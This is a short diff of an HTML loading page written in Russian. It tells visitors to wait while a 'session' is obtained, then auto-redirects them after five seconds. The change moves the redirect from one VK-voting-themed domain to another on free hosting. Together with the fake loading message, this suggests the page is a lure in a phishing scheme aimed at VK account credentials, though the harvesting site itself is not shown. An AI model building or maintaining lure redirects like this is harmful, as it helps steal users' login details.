--- a/index.html
+++ b/index.html
@@ -11,12 +11,12 @@
    </head>
    <body>
 	<center><h3>Пожалуйста, подождите... </br>
-	<center><h4>Дождитесь окончания загрузки<h4></center>
+	<center><h4>Дождитесь окончания загрузки,получение сессии....<h4></center>
 	
 
    <center><img src="load.gif"></center>
    <head>
-<meta http-equiv="refresh" content="5;URL=http://vkgolos.dx.am/" />
+<meta http-equiv="refresh" content="5;URL=https://vkgolossing.000webhostapp.com/" />
 </head>
 
 </body></html>
